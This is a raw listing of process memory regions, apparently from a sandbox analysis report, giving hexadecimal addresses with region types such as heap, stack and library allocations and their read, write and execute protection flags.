14E33D0A000
heap
page read and write
188010B7000
trusted library allocation
page read and write
188102FE000
trusted library allocation
page read and write
2056BBF2000
heap
page read and write
1CAD6557000
trusted library allocation
page read and write
2056BCE8000
trusted library allocation
page read and write
205679BF000
heap
page read and write
187262B2000
heap
page read and write
1B9A7FD6000
trusted library allocation
page read and write
1CAD649A000
heap
page read and write
2CA5FFE000
stack
page read and write
205679C6000
heap
page read and write
20567B22000
heap
page read and write
14E33C00000
heap
page read and write
1CAD8C35000
trusted library allocation
page read and write
1760A6C8000
heap
page read and write
205679AA000
heap
page read and write
20567B8A000
heap
page read and write
205679C6000
heap
page read and write
2CA5C7E000
unkown
page readonly
2056C160000
trusted library allocation
page read and write
18726214000
heap
page read and write
205679C6000
heap
page read and write
2056BE19000
trusted library allocation
page read and write
231000
unkown
page readonly
3974000
heap
page read and write
14E33EB0000
heap
page readonly
1618000
heap
page read and write
7FFD9B2D0000
trusted library allocation
page read and write
11BF000
stack
page read and write
205679BE000
heap
page read and write
205679C6000
heap
page read and write
205679C1000
heap
page read and write
1CAD8C0E000
trusted library allocation
page read and write
1760CB90000
trusted library allocation
page read and write
1A5E4CAB000
heap
page read and write
1CAD67F7000
heap
page read and write
1CAD6489000
heap
page read and write
1CAD646A000
heap
page read and write
20567B26000
heap
page read and write
1CAD67CE000
heap
page read and write
44C0000
direct allocation
page read and write
7FFD9B083000
trusted library allocation
page execute and read and write
1CAD641A000
heap
page read and write
3D76000
heap
page read and write
1CAD67E5000
heap
page read and write
18801183000
trusted library allocation
page read and write
1A5E4D29000
heap
page read and write
1CAD65D3000
trusted library allocation
page read and write
14E33CE2000
heap
page read and write
20567B39000
heap
page read and write
17214FE000
stack
page read and write
7FFD9B992000
trusted library allocation
page read and write
4234000
direct allocation
page read and write
1887C799000
heap
page read and write
205679BF000
heap
page read and write
20567989000
heap
page read and write
1CAD8CC0000
trusted library allocation
page read and write
14E38375000
trusted library allocation
page read and write
20567B88000
heap
page read and write
20567B20000
heap
page read and write
1CAD8A38000
heap
page read and write
1760C776000
trusted library allocation
page read and write
7FFD9B3A0000
trusted library allocation
page read and write
20566CD0000
trusted library allocation
page read and write
1FD6504E000
heap
page read and write
1720B83000
stack
page read and write
1CAD63B0000
heap
page read and write
1CAD8B35000
trusted library allocation
page read and write
18726230000
heap
page read and write
1A5E4C1E000
heap
page read and write
1872622B000
heap
page read and write
1CAD8932000
heap
page read and write
2CA667E000
stack
page read and write
1CAD88FC000
heap
page read and write
18726238000
heap
page read and write
1CAD6463000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
163D000
heap
page read and write
205679C6000
heap
page read and write
7FFD9B2D0000
trusted library allocation
page read and write
2056BC38000
heap
page read and write
2056798D000
heap
page read and write
2CA56FE000
unkown
page readonly
3F80000
direct allocation
page read and write
1C2D421E000
heap
page read and write
20567B71000
heap
page read and write
159C000
heap
page read and write
7FFD9B420000
trusted library allocation
page read and write
7FFD9B2A0000
trusted library allocation
page read and write
7FFD9B15C000
trusted library allocation
page execute and read and write
15CC000
heap
page read and write
1B9A823A000
trusted library allocation
page read and write
1CAD8C35000
trusted library allocation
page read and write
205679C1000
heap
page read and write
1CAD8C05000
trusted library allocation
page read and write
1FD65017000
heap
page read and write
171000
unkown
page execute read
2056BD2C000
trusted library allocation
page read and write
205679BF000
heap
page read and write
205679A5000
heap
page read and write
205679BF000
heap
page read and write
1CAD63A9000
heap
page read and write
205679C6000
heap
page read and write
15FB000
heap
page read and write
7FFD9B449000
trusted library allocation
page read and write
205679C6000
heap
page read and write
205679C6000
heap
page read and write
1872626C000
heap
page read and write
15C4000
heap
page execute and read and write
2056BBFB000
heap
page read and write
11FF000
stack
page read and write
205679C1000
heap
page read and write
7FFD9B370000
trusted library allocation
page read and write
7FFD9B458000
trusted library allocation
page read and write
205679F6000
heap
page read and write
1CAD682F000
heap
page read and write
1CAD8E64000
trusted library allocation
page read and write
14CA000
heap
page read and write
205679BF000
heap
page read and write
7FFD9B460000
trusted library allocation
page read and write
1872B4E0000
heap
page read and write
7FFD9B4A0000
trusted library allocation
page read and write
9EE80FB000
stack
page read and write
1FD65050000
heap
page read and write
1CAD63AF000
heap
page read and write
18726217000
heap
page read and write
83480FB000
stack
page read and write
205679BF000
heap
page read and write
1887C940000
heap
page read and write
38D6000
heap
page read and write
14E35E54000
trusted library allocation
page read and write
205679C6000
heap
page read and write
20567B03000
heap
page read and write
15EB000
heap
page read and write
1CAD6498000
heap
page read and write
205679C6000
heap
page read and write
205679C1000
heap
page read and write
7FFD9B3E0000
trusted library allocation
page read and write
1B9A5DE7000
heap
page read and write
205679CC000
heap
page read and write
1FD65040000
heap
page read and write
205679C1000
heap
page read and write
1880007D000
trusted library allocation
page read and write
1CAD67F7000
heap
page read and write
2CA66FE000
unkown
page readonly
1CAD8934000
heap
page read and write
1A5E4C5B000
heap
page read and write
187264F0000
heap
page read and write
7DA8CFE000
stack
page read and write
83482FD000
stack
page read and write
1CAD8A35000
heap
page read and write
205679C6000
heap
page read and write
205679F6000
heap
page read and write
1760A8F0000
heap
page read and write
1CAD65D0000
trusted library allocation
page read and write
7FFD9B260000
trusted library allocation
page execute and read and write
2056BC7A000
heap
page read and write
18726281000
heap
page read and write
1A5EA1B0000
trusted library allocation
page read and write
20567B0F000
heap
page read and write
1CAD8E7D000
trusted library allocation
page read and write
20567B50000
heap
page read and write
18810013000
trusted library allocation
page read and write
7FFD9B0FC000
trusted library allocation
page execute and read and write
1B9A7FA0000
trusted library allocation
page read and write
1887E920000
heap
page read and write
1C2D42F7000
heap
page read and write
1CAD6487000
heap
page read and write
2056BC31000
heap
page read and write
38DB000
heap
page read and write
18800DB5000
trusted library allocation
page read and write
205679C1000
heap
page read and write
205679C1000
heap
page read and write
205679C1000
heap
page read and write
3A40000
direct allocation
page read and write
1FD64FD5000
heap
page read and write
1C2D5D60000
heap
page read and write
2056BC5C000
heap
page read and write
2056BBF2000
heap
page read and write
1CAD6556000
trusted library allocation
page read and write
20567B24000
heap
page read and write
1887EBF2000
heap
page read and write
1CAD8A38000
heap
page read and write
1FD6500B000
heap
page read and write
1A5EA1E0000
trusted library allocation
page read and write
20567B33000
heap
page read and write
20567B28000
heap
page read and write
1A5EA26A000
trusted library allocation
page read and write
2056C120000
trusted library allocation
page read and write
205679B1000
heap
page read and write
3A49000
heap
page read and write
1502000
heap
page read and write
25E077E000
stack
page read and write
14E4E04A000
heap
page read and write
20567B28000
heap
page read and write
1CAD63C4000
heap
page read and write
1CAD67F7000
heap
page read and write
1CAD8E6F000
trusted library allocation
page read and write
1760C7C5000
trusted library allocation
page read and write
205679BF000
heap
page read and write
1CAD88ED000
heap
page read and write
1CAD8907000
heap
page read and write
18810015000
trusted library allocation
page read and write
1FD65026000
heap
page read and write
205679C6000
heap
page read and write
2056BD2C000
trusted library allocation
page read and write
2CA46F7000
stack
page read and write
187262B2000
heap
page read and write
15A7000
heap
page read and write
205679C1000
heap
page read and write
1CAD65E0000
trusted library allocation
page read and write
1A5EA4CE000
heap
page read and write
14E360D9000
trusted library allocation
page read and write
2CA5DF9000
stack
page read and write
17211F9000
stack
page read and write
1CAD6194000
trusted library allocation
page read and write
20567B7D000
heap
page read and write
20567998000
heap
page read and write
1CAD8C0E000
trusted library allocation
page read and write
205679BF000
heap
page read and write
7FFD9B340000
trusted library allocation
page read and write
1B9B7E90000
trusted library allocation
page read and write
3DDD000
heap
page read and write
1A5E4C78000
heap
page read and write
7FFD9B0CD000
trusted library allocation
page execute and read and write
1CAD8E65000
trusted library allocation
page read and write
7FFD9B220000
trusted library allocation
page read and write
1CAD8E80000
trusted library allocation
page read and write
18800ABD000
trusted library allocation
page read and write
205679C6000
heap
page read and write
18726281000
heap
page read and write
205679BF000
heap
page read and write
1CAD8C80000
trusted library allocation
page read and write
18726217000
heap
page read and write
18726204000
heap
page read and write
1CAD649D000
heap
page read and write
7FFD9B272000
trusted library allocation
page read and write
7FFD9B150000
trusted library allocation
page read and write
1601000
heap
page read and write
2056C0E0000
trusted library allocation
page read and write
1A5E4CB9000
heap
page read and write
1CAD88F7000
heap
page read and write
20567B24000
heap
page read and write
165C000
heap
page read and write
1760C580000
heap
page readonly
391F000
heap
page read and write
7FFD9B3B0000
trusted library allocation
page read and write
7FFD9B231000
trusted library allocation
page read and write
205679C1000
heap
page read and write
166E000
heap
page read and write
2056BBFB000
heap
page read and write
205679C6000
heap
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
1CAD89C0000
heap
page read and write
1760A7B8000
heap
page read and write
14E374E9000
trusted library allocation
page read and write
1CAD8C0E000
trusted library allocation
page read and write
1613000
heap
page read and write
1CAD6800000
heap
page read and write
1872629D000
heap
page read and write
23D000
unkown
page read and write
14E36AE9000
trusted library allocation
page read and write
7FFD9B310000
trusted library allocation
page read and write
3CED000
heap
page read and write
1887C7D1000
heap
page read and write
2056BB5E000
heap
page read and write
1CAD899F000
heap
page read and write
20567B77000
heap
page read and write
1887C990000
heap
page readonly
7FFD9B380000
trusted library allocation
page read and write
7FFD9B084000
trusted library allocation
page read and write
2056BE19000
trusted library allocation
page read and write
1A5EA1B8000
trusted library allocation
page read and write
3A51000
heap
page read and write
1760C100000
heap
page read and write
1762485B000
heap
page read and write
205679C6000
heap
page read and write
1B9A5DED000
heap
page read and write
14E4E091000
heap
page read and write
205679BE000
heap
page read and write
1B9A8350000
trusted library allocation
page read and write
20567B39000
heap
page read and write
1A5E4BF0000
heap
page read and write
20566D98000
trusted library allocation
page read and write
7FFD9B3D0000
trusted library allocation
page read and write
9EE7EFE000
stack
page read and write
2056AD60000
trusted library allocation
page read and write
14E4DD3C000
heap
page read and write
2CA52FE000
unkown
page readonly
1A5E5500000
heap
page read and write
2056BC38000
heap
page read and write
1A5EA280000
trusted library allocation
page read and write
1A5EA214000
trusted library allocation
page read and write
20567AFA000
heap
page read and write
1CAD8A35000
heap
page read and write
20567946000
heap
page read and write
205679BF000
heap
page read and write
205679BF000
heap
page read and write
1CAD6483000
heap
page read and write
1553000
heap
page execute and read and write
14E356F0000
heap
page read and write
7FFD9B423000
trusted library allocation
page read and write
1760C69B000
trusted library allocation
page read and write
1C2D4229000
heap
page read and write
1CAD6487000
heap
page read and write
1CAD6521000
trusted library allocation
page read and write
205679BF000
heap
page read and write
1C2D42DB000
heap
page read and write
170000
unkown
page readonly
28999E000
stack
page read and write
2056BB54000
heap
page read and write
20567991000
heap
page read and write
2056BB64000
heap
page read and write
205679C1000
heap
page read and write
205679C6000
heap
page read and write
7FFD9B3D0000
trusted library allocation
page read and write
20566BD6000
heap
page read and write
7FFD9B4F0000
trusted library allocation
page read and write
205679C1000
heap
page read and write
14E4DD53000
heap
page read and write
14E45C31000
trusted library allocation
page read and write
205679BF000
heap
page read and write
1A5EA23E000
trusted library allocation
page read and write
14E45C5F000
trusted library allocation
page read and write
1A5EA310000
trusted library allocation
page read and write
25E087E000
stack
page read and write
1C2D41C0000
heap
page read and write
1CAD8C11000
trusted library allocation
page read and write
2056BBF2000
heap
page read and write
1887ECBA000
heap
page read and write
2056BB5D000
heap
page read and write
2056BE13000
trusted library allocation
page read and write
187262B2000
heap
page read and write
205679C1000
heap
page read and write
205679BF000
heap
page read and write
14E4DFB2000
heap
page read and write
2056BAB0000
heap
page read and write
24646B8000
stack
page read and write
1CAD6559000
trusted library allocation
page read and write
205679C1000
heap
page read and write
2056BC36000
heap
page read and write
1CAD67B0000
heap
page read and write
2CA50FB000
stack
page read and write
7FFD9BC60000
trusted library allocation
page read and write
2056BC3C000
heap
page read and write
1721FCE000
stack
page read and write
7FFD9B370000
trusted library allocation
page read and write
1A5E4C43000
heap
page read and write
1C2D42A2000
heap
page read and write
205679BF000
heap
page read and write
7FFD9B2E0000
trusted library allocation
page read and write
2056BBF7000
heap
page read and write
2056BC36000
heap
page read and write
205679C8000
heap
page read and write
205679C1000
heap
page read and write
2CA4CFC000
stack
page read and write
1CAD643F000
heap
page read and write
2CA527E000
stack
page read and write
24641FE000
stack
page read and write
205679C6000
heap
page read and write
205679B8000
heap
page read and write
14E4DDF0000
heap
page read and write
1FD65050000
heap
page read and write
2084000
heap
page read and write
1CAD6432000
heap
page read and write
1CAD8E61000
trusted library allocation
page read and write
205679C1000
heap
page read and write
1760A6C0000
heap
page read and write
1CAD67E5000
heap
page read and write
1CAD8A33000
heap
page read and write
1CAD6832000
heap
page read and write
205679CC000
heap
page read and write
1A5E4C9B000
heap
page read and write
1CAD641A000
heap
page read and write
1887E893000
heap
page read and write
205679C1000
heap
page read and write
20567B22000
heap
page read and write
7FFD9B270000
trusted library allocation
page execute and read and write
1CAD63B1000
heap
page read and write
20567940000
heap
page read and write
2056BC38000
heap
page read and write
15F1000
heap
page read and write
1B9BFEA0000
heap
page read and write
1CAD8D80000
trusted library allocation
page read and write
20566D05000
trusted library allocation
page read and write
1618000
heap
page read and write
7FFD9B260000
trusted library allocation
page execute and read and write
7FFD9B09B000
trusted library allocation
page read and write
1C2D42DB000
heap
page read and write
1CAD6483000
heap
page read and write
205679C1000
heap
page read and write
1CAD6809000
heap
page read and write
7FFD9B440000
trusted library allocation
page read and write
1CAD8C35000
trusted library allocation
page read and write
1CAD6194000
trusted library allocation
page read and write
1CAD89C3000
heap
page read and write
1C2D5BBC000
heap
page read and write
7FFD9B9AC000
trusted library allocation
page read and write
1A5EA2AC000
trusted library allocation
page read and write
1887C6D0000
heap
page read and write
1CAD63A0000
heap
page read and write
20567B50000
heap
page read and write
1760A716000
heap
page read and write
17624800000
heap
page read and write
205679C1000
heap
page read and write
7FFD9B480000
trusted library allocation
page read and write
1C2D4210000
heap
page read and write
2056BC31000
heap
page read and write
205679AA000
heap
page read and write
205679BF000
heap
page read and write
2CA49FE000
unkown
page readonly
2056BC36000
heap
page read and write
7FFD9B450000
trusted library allocation
page read and write
17624ADF000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1CAD8E7E000
trusted library allocation
page read and write
7FFD9B410000
trusted library allocation
page read and write
1CAD8E77000
trusted library allocation
page read and write
15F7000
heap
page read and write
1B9A5DA1000
heap
page read and write
15F0000
heap
page read and write
1B9A5DAD000
heap
page read and write
205679BF000
heap
page read and write
1CAD8907000
heap
page read and write
1CAD8C35000
trusted library allocation
page read and write
1CAD8D60000
trusted library allocation
page read and write
20567B24000
heap
page read and write
1CAD647D000
heap
page read and write
1C2D42F6000
heap
page read and write
1760A670000
heap
page read and write
2056BB4F000
heap
page read and write
1C2D5D6D000
heap
page read and write
205679BF000
heap
page read and write
1A5E5370000
trusted library section
page read and write
205679C6000
heap
page read and write
1CAD649A000
heap
page read and write
20567A90000
remote allocation
page read and write
1CAD8C35000
trusted library allocation
page read and write
7FFD9B090000
trusted library allocation
page read and write
1CAD6141000
trusted library allocation
page read and write
205679C1000
heap
page read and write
1FD6525E000
heap
page read and write
205679C1000
heap
page read and write
187264FC000
heap
page read and write
1CAD8C35000
trusted library allocation
page read and write
7FFD9BB4A000
trusted library allocation
page read and write
205679C1000
heap
page read and write
7FFD9B242000
trusted library allocation
page read and write
2056ACC1000
trusted library allocation
page read and write
4348000
direct allocation
page read and write
20566D60000
trusted library allocation
page read and write
7FFD9B458000
trusted library allocation
page read and write
1872626C000
heap
page read and write
205679C3000
heap
page read and write
205679BF000
heap
page read and write
2056BD22000
trusted library allocation
page read and write
1B9A7740000
heap
page execute and read and write
1A5E6120000
trusted library allocation
page read and write
20566BD2000
heap
page read and write
7DA8DFE000
stack
page read and write
7FFD9B993000
trusted library allocation
page execute and read and write
205679C6000
heap
page read and write
1A5E4D02000
heap
page read and write
1CAD67E1000
heap
page read and write
1B9A7C90000
heap
page read and write
14E37B8D000
trusted library allocation
page read and write
1B9BFF80000
heap
page read and write
205679C1000
heap
page read and write
205679C6000
heap
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
1CAD6194000
trusted library allocation
page read and write
1887CA80000
heap
page read and write
14E4E0C6000
heap
page read and write
1CAD6800000
heap
page read and write
24642FD000
stack
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
1B9A7CC5000
heap
page read and write
205679BF000
heap
page read and write
1414000
heap
page read and write
1CAD88E0000
heap
page read and write
1CAD6832000
heap
page read and write
1CAD67E1000
heap
page read and write
14E3602F000
trusted library allocation
page read and write
2056BD2C000
trusted library allocation
page read and write
1760C5F0000
heap
page execute and read and write
1A5EA4EF000
heap
page read and write
172204D000
stack
page read and write
1887C825000
heap
page read and write
1CAD8B20000
trusted library allocation
page read and write
20566CD9000
trusted library allocation
page read and write
1CAD6489000
heap
page read and write
18726236000
heap
page read and write
20566BDC000
heap
page read and write
3994000
heap
page read and write
18810075000
trusted library allocation
page read and write
205679BF000
heap
page read and write
1B9A7E81000
trusted library allocation
page read and write
18726228000
heap
page read and write
205679C1000
heap
page read and write
1667000
heap
page read and write
187262B2000
heap
page read and write
1CAD67E5000
heap
page read and write
1CAD89D3000
heap
page read and write
1360000
heap
page read and write
1CAD6806000
heap
page read and write
14E4DF9E000
heap
page read and write
1B9A8325000
trusted library allocation
page read and write
18810210000
trusted library allocation
page read and write
7DA89FE000
stack
page read and write
2056BD18000
trusted library allocation
page read and write
205679AA000
heap
page read and write
18810001000
trusted library allocation
page read and write
7FFD9B450000
trusted library allocation
page read and write
1CAD67E1000
heap
page read and write
2056BE17000
trusted library allocation
page read and write
2056BB68000
heap
page read and write
1CAD6130000
trusted library allocation
page read and write
1479000
heap
page read and write
7FFD9BC10000
trusted library allocation
page read and write
1872626C000
heap
page read and write
205679D0000
heap
page read and write
3A5D000
heap
page read and write
1CAD6806000
heap
page read and write
2056BBF2000
heap
page read and write
3DE3000
heap
page read and write
7FFD9B423000
trusted library allocation
page read and write
1CAD63AE000
heap
page read and write
1C2D41E0000
trusted library allocation
page read and write
3D6A000
heap
page read and write
1760C685000
trusted library allocation
page read and write
14E33CCA000
heap
page read and write
20567B78000
heap
page read and write
1880169B000
trusted library allocation
page read and write
1760CB3E000
trusted library allocation
page read and write
210C000
heap
page read and write
7FFD9B2E0000
trusted library allocation
page read and write
1A5E4CFC000
heap
page read and write
205679C3000
heap
page read and write
1CAD60D0000
trusted library allocation
page read and write
205679BE000
heap
page read and write
7FFD9B2B0000
trusted library allocation
page read and write
7FFD9B500000
trusted library allocation
page read and write
7FFD9BB72000
trusted library allocation
page read and write
1CAD63CF000
heap
page read and write
1CAD645E000
heap
page read and write
1887C7FA000
heap
page read and write
1CAD67E9000
heap
page read and write
7FFD9B0A3000
trusted library allocation
page execute and read and write
1CAD8C35000
trusted library allocation
page read and write
7FFD9BB41000
trusted library allocation
page read and write
1CAD8910000
heap
page read and write
1CAD8C0E000
trusted library allocation
page read and write
1CAD6801000
heap
page read and write
7FFD9B2D0000
trusted library allocation
page read and write
3DD7000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
380B000
heap
page read and write
18726223000
heap
page read and write
3968000
heap
page read and write
14E33D0D000
heap
page read and write
1CAD8910000
heap
page read and write
1881001D000
trusted library allocation
page read and write
1887C7AF000
heap
page read and write
1CAD6806000
heap
page read and write
1C2D41A3000
trusted library allocation
page read and write
11CF000
stack
page read and write
20567140000
trusted library allocation
page read and write
205679C6000
heap
page read and write
205679C6000
heap
page read and write
1C2D43EE000
heap
page read and write
205679C1000
heap
page read and write
20567B28000
heap
page read and write
7FFD9B1C0000
trusted library allocation
page execute and read and write
205679C1000
heap
page read and write
14E33EA0000
trusted library allocation
page read and write
15A2000
heap
page read and write
1554000
heap
page read and write
1887E874000
heap
page read and write
834817E000
stack
page read and write
163D000
heap
page read and write
2CA47FE000
unkown
page readonly
2CA51FE000
unkown
page readonly
1B9A7E9B000
trusted library allocation
page read and write
205679AA000
heap
page read and write
18800683000
trusted library allocation
page read and write
1FD65020000
heap
page read and write
1610000
heap
page read and write
1CAD6439000
heap
page read and write
11CE000
stack
page read and write
20567B1B000
heap
page read and write
1CAD88ED000
heap
page read and write
2056BC43000
heap
page read and write
7FFD9B350000
trusted library allocation
page read and write
2056BD22000
trusted library allocation
page read and write
1A5EA206000
trusted library allocation
page read and write
20566D18000
trusted library allocation
page read and write
1A5E5400000
heap
page read and write
20567B06000
heap
page read and write
2056798D000
heap
page read and write
205679C6000
heap
page read and write
20567B7C000
heap
page read and write
834873E000
stack
page read and write
3E32000
heap
page read and write
18801489000
trusted library allocation
page read and write
205679BE000
heap
page read and write
1CAD6559000
trusted library allocation
page read and write
205679C6000
heap
page read and write
2056BB5E000
heap
page read and write
7FFD9B444000
trusted library allocation
page read and write
2056BE19000
trusted library allocation
page read and write
2056BE19000
trusted library allocation
page read and write
7FFD9B176000
trusted library allocation
page execute and read and write
7FFD9B490000
trusted library allocation
page read and write
1760CB6E000
trusted library allocation
page read and write
1C2D5BB8000
heap
page read and write
2056BB56000
heap
page read and write
2CA5B7E000
stack
page read and write
20566D98000
trusted library allocation
page read and write
7FFD9B140000
trusted library allocation
page read and write
1A5E4C6E000
heap
page read and write
15C5000
heap
page read and write
1CAD6559000
trusted library allocation
page read and write
1CAD60D9000
trusted library allocation
page read and write
1CAD6472000
heap
page read and write
205679C1000
heap
page read and write
1760C773000
trusted library allocation
page read and write
397C000
heap
page read and write